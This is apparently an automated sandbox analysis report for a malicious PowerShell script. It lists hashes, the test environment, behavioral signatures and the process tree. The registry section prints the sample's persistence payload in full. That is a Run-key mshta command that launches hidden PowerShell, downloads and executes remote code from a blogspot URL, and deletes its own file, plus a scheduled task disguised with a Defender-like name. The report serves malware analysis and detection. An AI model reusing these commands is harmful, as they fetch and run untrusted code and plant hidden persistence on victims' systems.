Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
29-11-2024 02:09
Static task
static1
Behavioral task
behavioral1
Sample
19bad3275a0cd1caa9a8eb75d496eaa897ca4c7a07aeab78ab3309d91b4f64fd.ps1
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
19bad3275a0cd1caa9a8eb75d496eaa897ca4c7a07aeab78ab3309d91b4f64fd.ps1
Resource
win10v2004-20241007-en
General
-
Target
19bad3275a0cd1caa9a8eb75d496eaa897ca4c7a07aeab78ab3309d91b4f64fd.ps1
-
Size
2.5MB
-
MD5
7c2e9489af70d3967960dbe1cb87f4ae
-
SHA1
bcade1f31f869e58848c09cd022652b612580daf
-
SHA256
19bad3275a0cd1caa9a8eb75d496eaa897ca4c7a07aeab78ab3309d91b4f64fd
-
SHA512
9d910243fa5847046dd6793465d5b84c2e1f72d7d42acd5e52860f9bd3545b25e981322a312930a192dd43bafe3c5679657699a78bc98f48b4b6a2aec447a374
-
SSDEEP
1536:7Ic2Lo8L+bTXe26vgn00oR/S7rV521Gd9AcaMorjFN4UAjtbTliBdIpjXClBEv7l:ZD1
Malware Config
Signatures
-
Deletes itself 1 IoCs
pid Process 2612 powershell.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\Defenderl-143 = "schtasks /run /tn Defenderl-143" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\Defenderlt-153 = "mshta \"javascript:nd=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hoot11nov.blogspot.com////loka.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(nd[2])[nd[0]](nd[1], 0, true);close();ap=new ActiveXObject('Scripting.FileSystemObject');ap.DeleteFile(WScript.ScriptFullName);\"" powershell.exe -
pid Process 2612 powershell.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 2612 powershell.exe 2612 powershell.exe 2612 powershell.exe 2612 powershell.exe 2612 powershell.exe 2612 powershell.exe 2612 powershell.exe 2612 powershell.exe 2612 powershell.exe 2612 powershell.exe 2612 powershell.exe 2612 powershell.exe 2612 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2612 powershell.exe
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\19bad3275a0cd1caa9a8eb75d496eaa897ca4c7a07aeab78ab3309d91b4f64fd.ps11⤵
- Deletes itself
- Adds Run key to start application
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2612